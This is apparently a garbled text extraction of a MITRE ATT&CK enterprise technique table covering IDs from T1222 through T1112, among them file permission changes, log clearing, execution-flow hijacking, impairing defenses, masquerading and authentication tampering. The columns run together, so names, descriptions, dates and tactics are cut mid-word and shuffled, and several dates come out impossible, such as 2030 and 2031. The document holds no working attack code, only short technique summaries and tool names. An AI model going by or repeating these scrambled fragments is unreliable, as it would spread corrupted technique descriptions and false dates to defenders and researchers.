Ev (particularl
T1222.002attack-pat File and Di Adversarialhttps://attack.mitre.org/techniques/T1222/002
may use these commands
04 Februar14 to make
August themselves the owner
enterprise-1.2 Defenseof files
Ev and directories o
T1222.001attack-pat File and Di Adversarieshttps://attack.mitre.org/techniques/T1222/001
can interact
04 Februar21
with the DACLs April using
20enterprise-1.2
built-in Windows commands,
Defense Ev such as ìcacls`, `c
T1657 attack-pat Financial T Due to the https://attack.mitre.org/techniques/T1657
potentially18 immense
August business
15 Octoberenterprise-1.2
impact of financial theft,Impactan adversary may abuse th
T1495 attack-pat Firmware CIn general, https://attack.mitre.org/techniques/T1495
adversaries 12may
April manipulate,
2031 August overwrite,
enterprise-1.2
or
* A spearphishing attachment containing a document with a resource that corrupt firmware
Impact in order to deny theloa
is automatically u
T1187 attack-pat Forced Aut* A modified https://attack.mitre.org/techniques/T1187
.LNK or .SCF
16 January15
file with the Octoberenterprise-1.3
icon filename pointing to an Credential
external reference such as
T1606 attack-pat Forge WebOnce forged, https://attack.mitre.org/techniques/T1606
adversaries
17 Decemb
may use 15these
Octoberenterprise-1.5
web credentials to access Credential
resources (ex: [Use Alterna
T1606.002attack-pat Forge WebAn adversary https://attack.mitre.org/techniques/T1606/002
may gain17administrative
Decemb14 Octoberenterprise-1.4
Entra ID privileges if a SAML Credential
token is forged which claim
T1606.001attack-pat Forge WebOnce forged, https://attack.mitre.org/techniques/T1606/001
adversaries
17 Decemb
may use 19these
Septementerprise-1.1
web cookies to access resources
Credential ([Web Session Cooki
T1592 attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1592
may also 02gather
October03
victim host
Octoberenterprise-1.2
information via User-Agent Reconnaiss
HTTP headers, which are
T1592.004attack-pat Gather VictAdversarieshttps://attack.mitre.org/techniques/T1592/004
may gather 02 this
October17 Octoberenterprise-1.1
information in various ways, such as Reconnaiss
direct collection actions via [
T1592.003attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1592/003
may gather 02 this
October15 April 20enterprise-1.0
information in various ways, such as Reconnaiss
direct elicitation via [Phishin
T1592.001attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1592/001
may gather 02 this
October17 Octoberenterprise-1.1
information in various ways, such as Reconnaiss
direct collection actions via [
T1592.002attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1592/002
may gather 02 this
October17 Octoberenterprise-1.1
information in various ways, such as Reconnaiss
direct collection actions via [
T1589 attack-pat Gather VictGathering this
https://attack.mitre.org/techniques/T1589
02 October16
information may revealSeptementerprise-1.3
opportunities for other forms Reconnaiss
of reconnaissance (ex: [S
T1589.001attack-pat Gather VictGathering this
https://attack.mitre.org/techniques/T1589/001
02 October10
information may revealOctoberenterprise-1.2
opportunities for other forms Reconnaiss
of reconnaissance (ex: [S
T1589.002attack-pat Gather VictGathering this
https://attack.mitre.org/techniques/T1589/002
02 October21
information may revealOctoberenterprise-1.2
opportunities for other forms Reconnaiss
of reconnaissance (ex: [S
T1589.003attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1589/003
may easily02gather
October16 Septementerprise-1.0
employee names, since they may be Reconnaiss
readily available and expo
T1590 attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1590
may gather 02 this information
October15 in various ways, such as Reconnaiss
April 20enterprise-1.0 direct collection actions via [
T1590.002attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1590/002
may also 02useOctober11
DNS zone Novemb
transferenterprise-1.2
(DNS query type AXFR) to collect all records from
Reconnaiss
T1590.001attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1590/001
may gather 02 this information
October21 in various ways, such as Reconnaiss
Octoberenterprise-1.1 direct collection actions via [
T1590.005attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1590/005
may gather 02 this information
October15 in various ways, such as Reconnaiss
April 20enterprise-1.0 direct collection actions via [
T1590.006attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1590/006
may gather 02 this information
October15 in various ways, such as Reconnaiss
April 20enterprise-1.0 direct collection actions via [
T1590.004attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1590/004
may gather 02 this information
October15 in various ways, such as Reconnaiss
April 20enterprise-1.0 direct collection actions via [
T1590.003attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1590/003
may gather 02 this information
October15 in various ways, such as Reconnaiss
April 20enterprise-1.0 direct elicitation via [Phishin
T1591 attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1591
may gather 02 this information
October27 August in enterprise-1.1
various ways, such as Reconnaiss
direct elicitation via [Phishin
T1591.002attack-pat Gather VictAdversarieshttps://attack.mitre.org/techniques/T1591/002
may gather 02 this
October15
information
April 20enterprise-1.0
in various ways, such as Reconnaiss
direct elicitation via [Phishin
T1591.001attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1591/001
may gather 02 this
October27
information
August in enterprise-1.1
various ways, such as Reconnaiss
direct elicitation via [Phishin
T1591.003attack-pat Gather Vic Adversarieshttps://attack.mitre.org/techniques/T1591/003
may gather 02 this
October15
information
April 20enterprise-1.0
in various ways, such as Reconnaiss
direct elicitation via [Phishin
T1591.004attack-pat Gather VictAdversarieshttps://attack.mitre.org/techniques/T1591/004
may gather 02 this
October15
information
April 20enterprise-1.0
in various ways, such as Reconnaiss
direct elicitation via [Phishin
T1615 attack-pat Group Poli Adversarieshttps://attack.mitre.org/techniques/T1615
may use commands
06 August 06 such
Januaryenterprise-1.1
as <code>gpresult</code> Discovery
or various publicly available P
T1200 attack-pat Hardware AWhile public https://attack.mitre.org/techniques/T1200
references18 of
April
usage
2030 byMarch
threat actors
enterprise-1.6
are scarce, many Initial
red Acce
teams/penetration tes
T1564 attack-pat Hide ArtifaAdversarieshttps://attack.mitre.org/techniques/T1564
may also 26 Februar15
attempt Octoberenterprise-1.3
to hide Defensebehavior
artifacts associated with malicious Ev by creating
T1564.008attack-pat Hide ArtifaIn some environments,
https://attack.mitre.org/techniques/T1564/008
07administrators
June 2015 Octoberenterprise-1.4
may be able to enable email Defense Ev operate organiz
rules that
T1564.012attack-pat Hide ArtifaAdversarieshttps://attack.mitre.org/techniques/T1564/012
may abuse 29these
March 15 April to
exclusions 20enterprise-1.0 Defense For
hide their file-based artifacts. Evasion
example, rather
T1564.005attack-pat Hide ArtifaAdversarieshttps://attack.mitre.org/techniques/T1564/005
28 June
may use their own2029 June 20enterprise-1.0
abstracted file system, separate fromDefense Ev
the standard file system
T1564.001attack-pat Hide ArtifaAdversarieshttps://attack.mitre.org/techniques/T1564/001
26 to
can use this Februar29 March enterprise-1.0
their advantage Defense
to hide files and folders anywhereEv on the system a
T1564.002attack-pat Hide ArtifaOn Linux systems,
https://attack.mitre.org/techniques/T1564/002
13 Marchmay
adversaries 19 hide
April user
20enterprise-1.2 Defense
accounts from the login Ev also referred to
screen,
T1564.003attack-pat Hide Artif In addition,https://attack.mitre.org/techniques/T1564/003
Windows 13 March the
supports 13 `CreateDesktop()`
April 20enterprise-1.2 API that canDefense
create aEvhidden desktop wi
T1564.011attack-pat Hide ArtifaHiding fromhttps://attack.mitre.org/techniques/T1564/011
process interrupt
24 August signals may allow
06 Novemb malware to continue
enterprise-1.0 Defense execution,
Evasionbut unlike [Tr
T1564.004attack-pat Hide Artifa Adversaries may store malicious data or binaries
https://attack.mitre.org/techniques/T1564/004
13 March 12 Septementerprise-1.1 in file attribute metadata
Defense Evinstead of directly
T1564.010attack-pat Hide Artif This behavior may also 19be combined with other
https://attack.mitre.org/techniques/T1564/010
Novemb 29 Novemb tricks (such as [Parent
enterprise-1.0 Defense PIDEvSpoofing](https://a
T1564.009attack-pat Hide ArtifaAdversarieshttps://attack.mitre.org/techniques/T1564/009
can use resource forks to
12 October05 May hide
20malicious data that may
enterprise-1.0 otherwise
Defense Ev be stored direct
T1564.006attack-pat Hide ArtifaAdversarieshttps://attack.mitre.org/techniques/T1564/006
may utilize29native support
June 2014 for virtualization (ex: Hyper-V)
Octoberenterprise-1.1 Defense or drop
Ev the necessary fil
T1564.007attack-pat Hide Artif An adversary may hide malicious VBA code by overwriting
https://attack.mitre.org/techniques/T1564/007
17 Septem15 Octoberenterprise-1.1 the VBA source
Defense Ev code location with
T1665 attack-pat Hide InfrasHiding C2 infrastructure13 may also beApril
supported
https://attack.mitre.org/techniques/T1665
Februar18 by [Resource Development](https://attack.mi
20enterprise-1.0 Command and Contro
T1574 attack-pat Hijack Exe There are many ways 12
an March
adversary 21 may hijack
https://attack.mitre.org/techniques/T1574
Novemb the flow of execution,
enterprise-1.2 Defenseincluding
Eva by manipulatin
T1574.014attack-pat Hijack Exe Known as "AppDomainManager
https://attack.mitre.org/techniques/T1574/014
28 March 28 injection,"
April 20enterprise-1.0
adversaries may execute Defense
arbitrary
Evasion,
codePersi
by hijackin
T1574.012attack-pat Hijack Exe Adversarieshttps://attack.mitre.org/techniques/T1574/012
may abuse 24COR_PROFILER
June 2030 August to establish
enterprise-1.0
persistence that
Defense
executes
Eva a malicious DLL
T1574.001attack-pat Hijack ExecIf a search https://attack.mitre.org/techniques/T1574/001
order-vulnerable
13 Marchprogram
30 Septementerprise-1.3
is configured to run at a higher Defenseprivilege
Eva level, then the a
T1574.002attack-pat Hijack ExecSide-loadinghttps://attack.mitre.org/techniques/T1574/002
takes advantage
13 March of 30
theMarch
DLL search
enterprise-2.0
order used by theDefense
loader by Evapositioning both t
T1574.004attack-pat Hijack ExecAdversarieshttps://attack.mitre.org/techniques/T1574/004
may gain 16execution
March by 30 inserting
March enterprise-2.0
malicious dylibs withDefense
the name Evaof the missing dyl
T1574.006attack-pat Hijack ExecOn macOS https://attack.mitre.org/techniques/T1574/006
this behavior13 isMarch
conceptually
30 March theenterprise-2.0
same as on Linux, differing
Defense only
Evain how the macOS
T1574.005attack-pat Hijack ExecAdversarieshttps://attack.mitre.org/techniques/T1574/005
may use this13 March
technique 26 March
to replace enterprise-1.0
legitimate binariesDefense
with malicious
Eva ones as a me
T1574.013attack-pat Hijack ExecThe tamperedhttps://attack.mitre.org/techniques/T1574/013
function25isFebruar22
typically invoked
March using enterprise-1.0
a Windows message. Defense After
Evathe process is hija
T1574.007attack-pat Hijack Exe Adversarieshttps://attack.mitre.org/techniques/T1574/007
may also 13 March
directly 03 Octoberenterprise-1.1
modify the $PATH variable specifying Defense Eva
the directories to be searc
T1574.008attack-pat Hijack ExecSearch orderhttps://attack.mitre.org/techniques/T1574/008
hijacking13 is March 12 Septementerprise-1.0
also a common practice for hijacking DLLDefenseloads and Evais covered in [DLL
T1574.009attack-pat Hijack Exe This technique
https://attack.mitre.org/techniques/T1574/009
can be13 March
used 30 March enterprise-1.1
for persistence if executables are called Defense Eva basis, as well
on a regular
T1574.010attack-pat Hijack ExecAdversarieshttps://attack.mitre.org/techniques/T1574/010
may use this12 March
technique 30 March
to replace enterprise-1.0
legitimate binariesDefense Eva
with malicious ones as a me
T1574.011attack-pat Hijack ExecAdversarieshttps://attack.mitre.org/techniques/T1574/011
may also 13 addMarch 12 Septementerprise-1.1 key, which
the <code>Parameters</code> Defense
storesEvadriver-specific dat
T1562 attack-pat Impair Def https://attack.mitre.org/techniques/T1562
21 Februar14 Octoberenterprise-1.6 Defense Ev
T1562.002attack-pat Impair Def By disablinghttps://attack.mitre.org/techniques/T1562/002
Windows21 Februar18
event logging,Septementerprise-1.3
adversaries can operate while Defense
leavingEvless evidence of a
T1562.007attack-pat Impair DefeModifying orhttps://attack.mitre.org/techniques/T1562/007
disabling24a cloud
June 2016 Octoberenterprise-1.3
firewall Defense Ev
may enable adversary C2 communications, lateral mov
T1562.008attack-pat Impair Def For example, in AWS an 12 adversary
October14may disable CloudWatch/CloudTrail
https://attack.mitre.org/techniques/T1562/008
Octoberenterprise-2.1 Defense integrations
Ev prior to co
T1562.012attack-pat Impair Def With root privileges, adversaries may be able to ensure their activity
https://attack.mitre.org/techniques/T1562/012
24 May 20 03 Octoberenterprise-1.0 is notEvasion
Defense logged through dis
T1562.004attack-pat Impair DefeAdversarieshttps://attack.mitre.org/techniques/T1562/004
may also 21 modify host networking
Februar12 settings that indirectly
Septementerprise-1.2 manipulate
Defense Ev system firew
T1562.001attack-pat Impair DefeAdditionally, adversaries may exploit legitimate
https://attack.mitre.org/techniques/T1562/001
21 Februar12 April drivers from anti-virus
20enterprise-1.5 Defense software
Ev to gain access
T1562.010attack-pat Impair Def Adversarieshttps://attack.mitre.org/techniques/T1562/010
may similarly target network
08 October03 traffic to downgrade from
Octoberenterprise-1.2 an encrypted
Defense Ev HTTPS conn
T1562.003attack-pat Impair Def Adversarieshttps://attack.mitre.org/techniques/T1562/003
may also 21 leverage
Februar30 a [Network
March Device CLI](https://attack.mitre.org/techniques/T1
enterprise-2.2 Defense Ev
T1562.006attack-pat Impair DefeIn Linux environments, 19adversaries
March 14 may disable or reconfigure logDefense
https://attack.mitre.org/techniques/T1562/006
Februarenterprise-1.4 processingEv tools such as sys
T1562.009attack-pat Impair Def Adversarieshttps://attack.mitre.org/techniques/T1562/009
may also 23 addJunetheir2031
malicious
Augustapplications
enterprise-1.0to the list of minimalEvservices that start
Defense
T1562.011attack-pat Impair DefeFor example,https://attack.mitre.org/techniques/T1562/011
adversaries
14 March
may show 16 Octoberenterprise-1.0
a fake Windows Security GUIDefense and trayEvasion
icon with a “health
T1656 attack-pat ImpersonatThere is thehttps://attack.mitre.org/techniques/T1656
potential 08forAugust
multiple 15victims
Octoberenterprise-1.1
in campaigns involving Defense
impersonation.
EvasionFor example,
T1525 attack-pat Implant In A tool has been
https://attack.mitre.org/techniques/T1525
developed
04 Septem08
to facilitate
March planting
enterprise-2.1
backdoors in cloud Persistenc
container images.(Citation
T1070 attack-pat Indicator Removal ofhttps://attack.mitre.org/techniques/T1070
these indicators
31 Maymay 20 15interfere
Octoberenterprise-2.2
with event collection, Defense
reporting, Evor other processes
T1070.003attack-pat Indicator Adversaries https://attack.mitre.org/techniques/T1070/003
may run the 31 January14
PowerShell
* <code>/var/log/httpd/</code>: Februarenterprise-1.5
Webcommand <code>Clear-History</code>
server access and error logs Defense Ev to flush the entir
T1070.002attack-pat Indicator https://attack.mitre.org/techniques/T1070/002
28 January29 March enterprise-1.0 Defense Ev
T1070.008attack-pat Indicator Adversarieshttps://attack.mitre.org/techniques/T1070/008
may also 08 July 20
remove 15 Octoberenterprise-1.2
emails and metadata/headers indicative Defense Evasion
of spam or suspicious a
T1070.007attack-pat Indicator Malicious network
https://attack.mitre.org/techniques/T1070/007
15 June 2008
connections maySeptementerprise-1.1
also require changes to third-party Defenseapplications
Evasion or netwo
T1070.009attack-pat Indicator RIn some instances,
https://attack.mitre.org/techniques/T1070/009
29 Julyof20persistence
artifacts 11 April 20enterprise-1.1
may also be removed once Defense Evasion
an adversary’s persisten
T1070.001attack-pat Indicator Adversarieshttps://attack.mitre.org/techniques/T1070/001
may also 28 January16
attempt April
to clear 20enterprise-1.4
logs by directly deleting the Defense
stored Evlog files within `C:\W
T1070.004attack-pat Indicator RThere are tools
https://attack.mitre.org/techniques/T1070/004
31 January15
available from the host Octoberenterprise-1.1
operating system to perform Defense Ev but adversaries
cleanup,
T1070.005attack-pat Indicator Adversarie https://attack.mitre.org/techniques/T1070/005
31 January13 April 20enterprise-1.1 Defense Ev
T1070.010attack-pat Indicator Relocating https://attack.mitre.org/techniques/T1070/010
31 May 20
malicious payloads may13 also
Octoberenterprise-1.0
hinder defensive analysis,Defense especiallyEvasion
to separate these
T1070.006attack-pat Indicator Timestomping may be31 used along with
January30 file name [Masquerading](https://attack.mitre.org/tec
https://attack.mitre.org/techniques/T1070/006
Septementerprise-1.1 Defense Ev
T1202 attack-pat Indirect C Adversaries may abuse these features for
https://attack.mitre.org/techniques/T1202 [Defense
18 April 2003 Octoberenterprise-1.2 Evasion](https://attack.mitre.org/tactics/T
Defense Ev
T1105 attack-pat Ingress TooFiles can also be transferred
31 Mayusing 20 11various
https://attack.mitre.org/techniques/T1105 [Web Service](https://attack.mitre.org/techniques/
April 20enterprise-2.4 Command a
T1490 attack-pat Inhibit Sy Adversarieshttps://attack.mitre.org/techniques/T1490
may also 02 delete
April“online” backups that are connectedImpact
2024 Septementerprise-1.5 to their network – whether
T1056 attack-pat Input Capt Adversaries https://attack.mitre.org/techniques/T1056
* **Inline hooking**, 31 Mayoverwrites
which 20 13 August theenterprise-1.3 Collection,
first bytes in an API function to redirect code flow
T1056.004attack-pat Input Capt https://attack.mitre.org/techniques/T1056/004
11 Februar27 August enterprise-1.1 Collection,
T1056.002attack-pat Input Capt Adversaries may also 11 mimic common software
https://attack.mitre.org/techniques/T1056/002
* Custom drivers. Februar15 April authentication requests,
20enterprise-1.3 such as those from br
Collection,
T1056.001attack-pat Input Capt * [Modify System Image](https://attack.mitre.org/techniques/T1601)
https://attack.mitre.org/techniques/T1056/001
11 Februar01 Octoberenterprise-1.2 may provide adversarie
Collection,
T1056.003attack-pat Input Capt This variation
https://attack.mitre.org/techniques/T1056/003
on input11capture
Februar15 mayOctoberenterprise-1.0
be conducted post-compromise Collection,
using legitimate administ
T1559 attack-pat Inter-Proc Adversarieshttps://attack.mitre.org/techniques/T1559
may abuse 12IPCFebruar10
to execute Septementerprise-1.3
arbitrary code or commands. Execution
IPC mechanisms may diffe
T1559.001attack-pat Inter-Proc Various COM https://attack.mitre.org/techniques/T1559/001
interfaces12 are
Februar26
exposedJuly that20canenterprise-1.1
be abused to invoke Execution
arbitrary execution via a va
T1559.002attack-pat Inter-Proc DDE could https://attack.mitre.org/techniques/T1559/002
also be leveraged
12 Februar15by an adversary
Septementerprise-1.3
operating on a compromised
Execution machine who does
T1559.003attack-pat Inter-Proc Adversarieshttps://attack.mitre.org/techniques/T1559/003
can abuse12XPC October16
services Octoberenterprise-1.0
to execute malicious content.Execution Requests for malicious exec
T1534 attack-pat Internal SpAdversarieshttps://attack.mitre.org/techniques/T1534
may also 04 leverage
Septem15 internal
Octoberenterprise-1.4
chat apps, such as Microsoft Lateral
Teams, M to spread maliciou
T1570 attack-pat Lateral TooFiles can also
https://attack.mitre.org/techniques/T1570
be transferred
11 March using01native
Octoberenterprise-1.3
or otherwise present tools Lateralon theM victim system, suc
T1654 attack-pat Log EnumerIn additionhttps://attack.mitre.org/techniques/T1654
to gaining 10 a better
July 20understanding
15 Octoberenterprise-1.1
of the environment,Discovery
adversaries may also monit
T1036 attack-pat MasqueradRenaming abusable
https://attack.mitre.org/techniques/T1036
31 May
system 20 16 Octoberenterprise-1.7
utilities to evade security monitoring Defense is also a Ev form of [Masquerad
T1036.009attack-pat MasqueradiAnother example
https://attack.mitre.org/techniques/T1036/009
27 Septem03
is using the “daemon” Octoberenterprise-1.0
syscall to detach from the Defense
currentEvasion
parent process and
T1036.007attack-pat MasqueradiCommon file https://attack.mitre.org/techniques/T1036/007
types, such 04 August 14 Octoberenterprise-1.0
as text files (.txt, .doc, etc.) and image filesDefense(.jpg, Ev
.gif, etc.) are typical
T1036.001attack-pat MasqueradiUnlike [Code https://attack.mitre.org/techniques/T1036/001
10 Februar10 Februarenterprise-1.0
Signing](https://attack.mitre.org/techniques/T1553/002), Defense Evactivity will not re
this
T1036.010attack-pat MasqueradNote that thishttps://attack.mitre.org/techniques/T1036/010
05 from
is distinct August 17 Octoberenterprise-1.0 Defense Evasion
[Impersonation](https://attack.mitre.org/techniques/T1656), w
T1036.008attack-pat MasqueradiPolygot files,
https://attack.mitre.org/techniques/T1036/008
which are 08files
March that14 June
have 20enterprise-1.0
multiple different file typesDefense
and thatEvasion
function differentl
T1036.004attack-pat MasqueradiTasks or services
https://attack.mitre.org/techniques/T1036/004
10 Februar29
contain other fields, Septementerprise-1.2 Defense Ev may attempt to m
such as a description, that adversaries
T1036.005attack-pat MasqueradiAdversarieshttps://attack.mitre.org/techniques/T1036/005
may also 10 useFebruar12
the same Septementerprise-1.2
icon of the file they are tryingDefenseto mimic. Ev
T1036.003attack-pat MasqueradiAdversarieshttps://attack.mitre.org/techniques/T1036/003
10 Februar12 Septementerprise-1.1 Defense Ev
T1036.002attack-pat MasqueradiAdversarieshttps://attack.mitre.org/techniques/T1036/002
may abuse 10the RTLO character
Februar14 as a means of trickingDefense
Octoberenterprise-1.1 a user into Ev executing what t
T1036.006attack-pat MasqueradiAdversarieshttps://attack.mitre.org/techniques/T1036/006
can use this 10 feature
Februar30 to trick
March users into double clickingDefense
enterprise-1.0 benign-looking
Ev files of any f
T1556 attack-pat Modify AutAdversarieshttps://attack.mitre.org/techniques/T1556
may maliciously
11 Februar14 modifyOctoberenterprise-2.5
a part of this process to either reveal credentials or bypas
Credential
T1556.009attack-pat Modify AuthBy modifying conditional access policies, such as adding additional
https://attack.mitre.org/techniques/T1556/009
02 January16 Septementerprise-1.1 trusted IPAccess,
Credential ranges,Deremovin
T1556.001attack-pat Modify AutMalware may be used11 toFebruar21
inject falseAugustcredentials
https://attack.mitre.org/techniques/T1556/001 into the authentication
enterprise-2.1 Credential process on a domain
T1556.007attack-pat Modify AuthIn some cases, adversaries may be able to modify the hybrid identity
https://attack.mitre.org/techniques/T1556/007
28 Septem14 Octoberenterprise-1.1 authentication
Credential Access, Deprocess f
T1556.006attack-pat Modify AutDependinghttps://attack.mitre.org/techniques/T1556/006
on the scope, 31 May goals,20and privileges of the adversary, MFA
14 Octoberenterprise-1.3 defenses
Credential may be
Access, De disable
T1556.004attack-pat Modify Aut[Modify System
https://attack.mitre.org/techniques/T1556/004
Image](https://attack.mitre.org/techniques/T1601)
19 October14 Decembenterprise-2.0 Credential
may include implanted co
T1556.008attack-pat Modify AutAdversarieshttps://attack.mitre.org/techniques/T1556/008
may target 30planting
March 04 malicious
May 20network
enterprise-1.0
provider DLLsCredential
on systemsAccess, knownDe to have in
T1556.002attack-pat Modify AuthAdversarieshttps://attack.mitre.org/techniques/T1556/002
can register 11 malicious
Februar21passwordAugust enterprise-2.1
filters to harvest credentials
Credential from local computer
T1556.003attack-pat Modify AutMalicious modifications
https://attack.mitre.org/techniques/T1556/003
26 to
June the2021
PAMAugust
systementerprise-2.1
may also be abused to Credential
steal credentials. Adversar
T1556.005attack-pat Modify AutAn adversary https://attack.mitre.org/techniques/T1556/005
may set 13 thisJanuary26
property August
at various enterprise-1.1
scopes through Local Credential
Group Policy Editor, user p
T1578 attack-pat Modify CloPermissionshttps://attack.mitre.org/techniques/T1578
gained from 30 August
the modification
30 Septementerprise-1.2
of infrastructure components
Defensemay Ev bypass restrictio
T1578.002attack-pat Modify CloCreating a new
https://attack.mitre.org/techniques/T1578/002
instance14 may
May also 20 30allow
Septementerprise-1.2
an adversary to carry outDefensemalicious Evactivity within an e
T1578.001attack-pat Modify CloAn adversary https://attack.mitre.org/techniques/T1578/001
may [Create09 June Cloud2015 Octoberenterprise-1.2 Defense Ev
Instance](https://attack.mitre.org/techniques/T1578/002), m
T1578.003attack-pat Modify CloAn adversary https://attack.mitre.org/techniques/T1578/003
may also16[Create
June 2030 CloudSeptementerprise-1.2 Defense Ev
Instance](https://attack.mitre.org/techniques/T1578/00
T1578.005attack-pat Modify CloAdversarieshttps://attack.mitre.org/techniques/T1578/005
may also 05 Septem25
modify settingsSeptementerprise-2.0
that affect where cloud resourcesDefensecan Evasion
be deployed, such
T1578.004attack-pat Modify CloAnother variation
https://attack.mitre.org/techniques/T1578/004
16 June
of this 2008 March
technique enterprise-1.1
is to utilize temporary storageDefenseattached Evto the compute in
T1666 attack-pat Modify CloIn AWS environments,
https://attack.mitre.org/techniques/T1666
25adversaries
Septem25with Septementerprise-1.0
appropriate permissions Defense
in a givenEvasion
account may call th
T1112 attack-pat Modify RegThe Registry https://attack.mitre.org/techniques/T1112
of a remote 31 Maysystem 20 14mayAugust enterprise-1.4
be modified Defense
to aid in execution Ev as part of lateral
of files
